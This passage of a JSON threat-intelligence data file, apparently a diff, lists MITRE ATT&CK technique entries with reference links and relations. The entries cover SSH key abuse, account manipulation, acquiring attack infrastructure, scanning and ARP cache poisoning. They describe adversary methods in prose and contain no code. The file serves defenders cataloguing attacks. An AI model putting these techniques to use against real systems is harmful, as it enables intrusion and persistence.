Machines](https://app.tidalcyber.com/references/299f231f-70d1-4c1a-818f-8a01cf65382c)] This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.[[Venafi SSH Key Abuse](https://app.tidalcyber.com/references/cba14230-13bc-47ad-8f3f-d798217657bd)][[Cybereason Linux Exim Worm](https://app.tidalcyber.com/references/9523d8ae-d749-4c25-8c7b-df2d8c25c3c8)] It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) command.[[cisco_ip_ssh_pubkey_ch_cmd](https://app.tidalcyber.com/references/c6ffe974-f304-598c-bc4d-5da607c73802)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1098.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "4659b96f-0e8d-4480-966b-c75062645f14", + "value": "SSH Authorized Keys" + }, + { + "description": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. \n\nIn order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "0799f2ee-3a83-452e-9fa9-83e91d83be25", + "type": "similar" + }, + { + "dest-uuid": "71867386-ddc2-4cdb-a0c9-7c27172c23c1", + "type": "similar" + }, + { + "dest-uuid": "1169afd3-d80d-5942-b16f-8dc1812ef6bb", + "type": "similar" + }, + { + "dest-uuid": "15660958-1f4f-4136-8cda-82123fd38232", + "type": "similar" + }, + { + "dest-uuid": "34ffaa47-f591-4a44-bd7d-9790d81365cd", + "type": "similar" + }, + { + "dest-uuid": "4659b96f-0e8d-4480-966b-c75062645f14", + "type": "similar" + } + ], + "uuid": "65f7482c-485b-4fd7-80f5-0ec6e923ac4d", + "value": "Account Manipulation" + }, + { + "description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)][[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)][[Krebs Access Brokers Fortune 500](https://app.tidalcyber.com/references/37d237ae-f0a8-5b30-8f97-d751c1560391)] In some cases, adversary groups may form partnerships to share compromised systems with each other.[[CISA Karakurt 2022](https://app.tidalcyber.com/references/5a9a79fa-532b-582b-9741-cb732803cd22)]\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd)) or established access via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)][[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf), [Multi-Factor Authentication Interception](https://app.tidalcyber.com/technique/600d45ec-cb9c-47b8-ae94-326471ebb007), or even [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://app.tidalcyber.com/technique/56ab198f-f8bb-4fe9-bd85-5975d4d3863b) and [Credentials](https://app.tidalcyber.com/technique/e5d9c785-61bd-483f-b2ac-5bd9a8641b22), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "478da817-1914-50f6-b1fd-434081a34354", + "value": "Acquire Access" + }, + { + "description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.[[Norton Botnet](https://app.tidalcyber.com/references/f97427f1-ea16-4e92-a4a2-4d62a800df15)] Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or Distributed Denial of Service (DDoS).[[Imperva DDoS for Hire](https://app.tidalcyber.com/references/86f87ec6-058e-45a7-9314-0579a2b4e8f2)][[Krebs-Anna](https://app.tidalcyber.com/references/028b7582-be46-4642-9e36-b781cac66340)][[Krebs-Bazaar](https://app.tidalcyber.com/references/b46efda2-18e0-451e-b945-28421c2d5274)][[Krebs-Booter](https://app.tidalcyber.com/references/d29a88ae-273b-439e-8808-dc9931f1ff72)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1583.005" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "be637d66-5110-4872-bc15-63b062c3f290", + "value": "Botnet" + }, + { + "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://app.tidalcyber.com/technique/5c6c3492-5dbc-43ee-a3f2-ba1976d3b379)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.[[Unit42 DNS Mar 2019](https://app.tidalcyber.com/references/e41fde80-5ced-4f66-9852-392d1ef79520)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1583.002" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "bae33d7b-c835-4eda-b310-bf426270c0b1", + "value": "DNS Server" + }, + { + "description": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes, including for [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), and Command and Control.[[CISA MSS Sep 2020](https://app.tidalcyber.com/references/ffe613e3-b528-42bf-81d5-4d8de38b3457)] Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)][[PaypalScam](https://app.tidalcyber.com/references/bcea7897-6cb2-467d-ad3b-ffd20badf19f)] Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute \"IDN homograph attacks,\" creating visually similar lookalike domains used to deliver malware to victim machines.[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)][[tt_httrack_fake_domains](https://app.tidalcyber.com/references/9bdda422-dbf7-4b70-a7b1-9e3ad658c239)][[tt_obliqueRAT](https://app.tidalcyber.com/references/be1e3092-1981-457b-ae76-b55b057e1d73)][[httrack_unhcr](https://app.tidalcyber.com/references/a4a3fd3d-1c13-40e5-b462-fa69a1861986)][[lazgroup_idn_phishing](https://app.tidalcyber.com/references/83de363d-b575-4851-9c2d-a78f504cf754)]\n\nAdversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.[[Categorisation_not_boundary](https://app.tidalcyber.com/references/3c320f38-e691-46f7-a20d-58b024ea2fa2)][[Domain_Steal_CC](https://app.tidalcyber.com/references/30ab5d35-db9b-401f-89cb-73f2c7fea060)][[Redirectors_Domain_Fronting](https://app.tidalcyber.com/references/42c81d97-b6ee-458e-bff3-e8c4de882cd6)][[bypass_webproxy_filtering](https://app.tidalcyber.com/references/fab84597-99a0-4560-8c8c-11fd8c01d5fa)]\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1583.001" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d", + "value": "Domains" + }, + { + "description": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)] Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. \n\nAdversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)][[FBI-search](https://app.tidalcyber.com/references/deea5b42-bfab-50af-8d85-cc04fd317a82)] Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.[[sentinelone-malvertising](https://app.tidalcyber.com/references/7989f0de-90b8-5e6d-bc20-1764610d1568)] \n\nMalvertising may be used to support [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.[[BBC-malvertising](https://app.tidalcyber.com/references/425775e4-2948-5a73-a2d8-9a3edca74b1b)]\n\nAdversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)] Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1583.008" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "60ac24aa-ce63-5c1d-8126-db20a27d85be", + "value": "Malvertising" + }, + { + "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or email servers to support [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) operations. Instead of compromising a third-party [Server](https://app.tidalcyber.com/technique/ce71e252-3403-4287-a0b5-9328fa88af96) or renting a [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1583.004" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2", + "value": "Server" + }, + { + "description": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)][[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)] As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)][[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1583.007" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "c30faf84-496b-4f27-a4bc-aa36d583c69f", + "value": "Serverless" + }, + { + "description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1583.003" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23", + "value": "Virtual Private Server" + }, + { + "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1583.006" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "2e883e0d-1108-431a-a2dd-98ba98b69417", + "value": "Web Services" + }, + { + "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)] Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b), including from residential proxy services.[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)][[FBI Proxies Credential Stuffing](https://app.tidalcyber.com/references/17f9b7b0-3e1a-5d75-9030-da79fcccdb49)][[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)] Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + }, + { + "dest-uuid": "be637d66-5110-4872-bc15-63b062c3f290", + "type": "similar" + }, + { + "dest-uuid": "bae33d7b-c835-4eda-b310-bf426270c0b1", + "type": "similar" + }, + { + "dest-uuid": "b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d", + "type": "similar" + }, + { + "dest-uuid": "60ac24aa-ce63-5c1d-8126-db20a27d85be", + "type": "similar" + }, + { + "dest-uuid": "6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2", + "type": "similar" + }, + { + "dest-uuid": "c30faf84-496b-4f27-a4bc-aa36d583c69f", + "type": "similar" + }, + { + "dest-uuid": "2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23", + "type": "similar" + }, + { + "dest-uuid": "2e883e0d-1108-431a-a2dd-98ba98b69417", + "type": "similar" + } + ], + "uuid": "66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3", + "value": "Acquire Infrastructure" + }, + { + "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://app.tidalcyber.com/technique/58776ca9-0c54-487f-afcc-e7e5b661bd54), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1595.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "473afdb8-5048-4838-a3fc-56be30be1e56", + "value": "Scanning IP Blocks" + }, + { + "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://app.tidalcyber.com/technique/4acf57da-73c1-4555-a86a-38ea4a8b962d) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.[[OWASP Vuln Scanning](https://app.tidalcyber.com/references/039c0947-1976-4eb8-bb26-4c74dceea7f0)] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1595.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "c0a8e0d6-c108-4c15-9a3a-78ef1da06e32", + "value": "Vulnerability Scanning" + }, + { + "description": "Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578), or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).\n\nFor example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)] This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a) or [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c)). \n\nAs cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.[[S3Recon GitHub](https://app.tidalcyber.com/references/803c51be-a54e-4fab-8ea0-c6bef18e84d3)][[GCPBucketBrute](https://app.tidalcyber.com/references/d956e1f6-37ca-4352-b275-84c174888b88)] Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://app.tidalcyber.com/technique/77069b3f-9e42-4f1b-894f-8df568233df2) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1595.003" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "a0e40412-cbfb-477b-87fc-40f2c84d26be", + "value": "Wordlist Scanning" + }, + { + "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)][[OWASP Fingerprinting](https://app.tidalcyber.com/references/ec89a48b-3b00-4928-8450-d2fbd307817f)] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "473afdb8-5048-4838-a3fc-56be30be1e56", + "type": "similar" + }, + { + "dest-uuid": "c0a8e0d6-c108-4c15-9a3a-78ef1da06e32", + "type": "similar" + }, + { + "dest-uuid": "a0e40412-cbfb-477b-87fc-40f2c84d26be", + "type": "similar" + } + ], + "uuid": "a930437d-5a12-4dc4-b311-f5fd6a766c85", + "value": "Active Scanning" + }, + { + "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) or [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.[[RFC826 ARP](https://app.tidalcyber.com/references/8eef2b68-f932-4cba-8646-bff9a7848532)] Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.[[Sans ARP Spoofing Aug 2003](https://app.tidalcyber.com/references/1f9f5bfc-c044-4046-8586-39163a305c1e)][[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]\n\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.[[Sans ARP Spoofing Aug 2003](https://app.tidalcyber.com/references/1f9f5bfc-c044-4046-8586-39163a305c1e)]\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1557.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "03ef726b-ac65-4e23-8130-9d299a3f458a", + "value": "ARP Cache Poisoning" + }, + { + "description": "Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) or [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243).\n\nDHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.[[rfc2131](https://app.tidalcyber.com/references/b16bd2d5-162b-44cb-a812-7becd6684021)] The typical server-client interaction is as follows: \n\n1. The 